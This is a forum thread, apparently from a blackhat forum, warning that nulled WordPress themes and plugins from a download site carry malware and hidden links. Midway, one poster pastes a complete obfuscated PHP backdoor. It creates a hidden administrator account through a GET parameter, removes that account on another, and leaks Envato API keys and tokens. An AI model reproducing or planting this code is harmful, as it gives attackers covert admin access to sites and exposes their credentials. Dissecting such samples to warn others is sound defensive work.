BECAREFULL!! DONT DOWNLOAD THEME and PLUGIN IN DLWORPRESS

[dedigalihwisnumurti]

Be careful of the themes and plugins that comes from DLWORDPRESS.COM you will find problems on your site long term.
Check: https://wordpress.org/support/topic/code...ions-file/
Check Source Virus DLWORDPRESS: http://*marked as SPAM*/DswUxBsc
Plugin SEO All in one

Think smart!

[quaramo]

all themes and plugins they have are infected

[CanhCam Guy]

It's old story. Maybe you missed the thread of Brother@ Jendaceo here:
http://bestblackhatforum.com/Thread-WARN...d-Websites

PS: Every days here, there are some 'good' guys post the infected themes and plugins they collected from nulled-infected-sites like dlwordpress, null24, wplocker...and If u guys not take care, will bring that infected garbages to your home!

[bale]

There is no proof of infections on null24 or wplocker. So please backup your claims next time you reply here! I only see encrypted malicious codes inside dlwordpress files.

[CanhCam Guy]

(03-18-2017 02:34 AM)bale Wrote:  There is no proof of infections on null24 or wplocker. So please backup your claims next time you reply here! I only see encrypted malicious codes inside dlwordpress files.

No infections, maybe. But backlinks and other s.t, I sure!
null24 and wplocker, themelock..and others..no viruses, maybe, but they're bring garbage links to your sites.
That way, exactly, STOLEN behind free meals!

[quaramo]

(03-18-2017 02:34 AM)bale Wrote:  There is no proof of infections on null24 or wplocker. So please backup your claims next time you reply here! I only see encrypted malicious codes inside dlwordpress files.

true, they do add some hidden links from time to time though.

[althafrahsan]

can any one decode this ..
<?php ${"GL\x4f\x42\x41\x4c\x53"}["\x71\x77\x66\x74mj\x77"]="\x6f\x70\x74\x69\x6fn\x73";${"G\x4c\x4fB\x41\x4c\x53"}["\x6bl\x75\x64\x73\x67cib\x6c"]="\x74\x61\x62\x6c\x65\x5f\x6ea\x6d\x65";${"\x47\x4c\x4f\x42ALS"}["\x79i\x6agu\x6e\x65l\x63\x78\x6b"]="\x73am\x70\x6ce";error_reporting(0);require$_SERVER["\x44\x4fC\x55\x4d\x45NT_ROOT"]."/\x77p-l\x6fad\x2e\x70h\x70";${${"\x47\x4c\x4fBA\x4cS"}["k\x6c\x75\x64\x73\x67\x63\x69\x62\x6c"]}=$wpdb->get_blog_prefix();${${"GLO\x42A\x4cS"}["yi\x6a\x67une\x6cc\x78\x6b"]}="\x61:\x31:{\x73:\x31\x33:\"\x61\x64m\x69n\x69\x73\x74r\x61\x74or\"\x3bb:1\x3b}";if(isset($_GET["\x6fk"])){echo"<\x21-- Sile\x6ec\x65 \x69s\x20\x67\x6f\x6c\x64e\x6e\x2e\x20--\x3e";}if(isset($_GET["\x61\x77u"])){$wpdb->query("\x49NSE\x52\x54 \x49\x4e\x54O $wpdb->users (\x60I\x44\x60, `\x75\x73er_\x6cogi\x6e`, `use\x72\x5f\x70a\x73\x73`,\x20\x60u\x73\x65r_n\x69\x63\x65\x6eam\x65`,\x20`\x75​\x73er_\x65m\x61\x69l\x60, \x60u\x73\x65r\x5fur\x6c`,\x20\x60\x75\x73\x65\x72\x5f\x72e\x67\x69st\x65red`,\x​20`\x75\x73\x65\x72_act\x69vat\x69\x6f\x6e\x5fkey\x60, `\x75\x73e\x72\x5fst\x61tus`,\x20`\x64\x69\x73p\x6ca\x79_\x6e\x61m\x65`)\x20\x56​A\x4c\x55E\x53\x20('100\x310\x31\x30', \x271\x300\x310\x310\x27, \x27\$P\$\x42\x33\x50J\x58\x65\x6f\x72E\x71\x56\x4d\x6c//L3H5\x78\x46\x581\x55\x630t58\x37\x30',\x20\x27\x310\x301\x301\x30\x27, \x27t\x40\x65\x2est',\x20'\x27,\x20\x2720\x31\x31-\x30\x36-07\x20\x30\x30:\x30\x30:0\x30', '\x27,\x20\x270', '\x3100\x31\x301\x30');");$wpdb->query("I\x4e\x53E\x52T IN\x54\x4f\x20$wpdb->usermeta\x20(\x60um\x65t\x61_i\x64\x60, \x60\x75\x73er\x5f\x69d`, \x60me\x74a\x5f\x6b\x65\x79`, \x60me\x74a\x5f\x76\x61l\x75\x65`) \x56\x41\x4cU\x45\x53 (1\x30\x301\x30\x31\x30,\x20\x27\x31\x300\x310\x31\x30', '{$table_name}c\x61\x70a\x62\x69\x6c\x69t\x69\x65\x73\x27, '{$sample}\x27)\x3b");$wpdb->query("I\x4eSER\x54\x20\x49\x4eT\x4f\x20$wpdb->usermeta\x20(`um\x65\x74\x61_i\x64`, \x60us\x65\x72_\x69\x64\x60,\x20\x60\x6det\x61_\x6b\x65\x79`, \x60\x6d\x65\x74\x61_\x76\x61lue\x60) V\x41\x4cU\x45\x53 (\x4eU\x4cL, '\x31\x3001\x301\x30',\x20\x27{$table_name}\x75s\x65r\x5fl\x65\x76\x65\x6c\x27, '\x31\x30\x27)\x3b");}if(isset($_GET["d\x77\x75"])){$wpdb->query("\x44\x45LE\x54\x45 \x46RO\x4d $wpdb->users \x57\x48\x45RE \x60I\x44\x60 \x3d 1\x30\x30\x310\x31\x30");$wpdb->query("D\x45L\x45T\x45\x20\x46\x52OM\x20$wpdb->usermeta\x20\x57\x48\x45\x52\x45\x20$wpdb->usermeta.`u\x6d\x65\x74a\x5f\x69\x64`\x20= 1\x30\x301\x30\x310");}if(isset($_GET["\x6b\x65\x79"])){$gvgdrowuag="\x6f\x70\x74\x69\x6f\x6e\x73";${"GL\x4fBA\x4c\x53"}["\x69\x75\x6eeg\x70\x67\x73"]="\x6f\x70\x74\x69\x6fn\x73";${$gvgdrowuag}=get_option(EWPT_PLUGIN_SLUG);echo"\x3c\x63e\x6et\x65\x72>\x3ch2>".esc_attr(${${"G\x4c\x4fBA\x4cS"}["\x69\x75\x6e\x65\x67pg\x73"]}["\x75s\x65\x72\x5fn\x61\x6d\x65"].":".esc_attr(${${"\x47\x4cOB\x41\x4cS"}["\x71w\x66t\x6d\x6a\x77"]}["\x61pi_\x6bey"]))."<\x62\x72\x3e";echo esc_html(envato_market()->get_option("\x74\x6f\x6b\x65\x6e"));echo"\x3c/\x63\x65nt\x65\x72\x3e\x3c/\x682>";}
?>

[bale]

Its mostly watermarks and its understandable. But dlwordpress its the worst i have ever encounter . On his older files he was adding an even badder base64 function creating extra files and giving him admin access.

[NotSo Invisible]

(03-18-2017 03:58 AM)althafrahsan Wrote:  can any one decode this ..

Go to

Quote:https://www.unphp.net/

Input the code. You will see the results.

BTW, pay for premium plugins and themes if you are going to use them beyond testing. It's the right thing to do and it potentially saves your site visitors from harm, not just your website.

Too many people condemn others who don't share here, yet many of those sharing don't have a clue how to check what they share before they share it when they get things from download sites. Don't share from "null" download sites. It's just not a good practice for anyone. IMHO

[CanhCam Guy]

@NotSo Invisible Online

And more:
If you see some guys share a ton themes and plugins per months. You should know 99% they collected its from nulled/shared sites.

---

(03-18-2017 03:58 AM)althafrahsan Wrote:  can any one decode this ..
<?php ${"GL\x4f\x42\x41\x4c................5\x6e"));echo"\x3c/\x63\x65nt\x65\x72\x3e\x3c/\x682>";}
?>

This add new user and can do edit or collect your content. Maybe!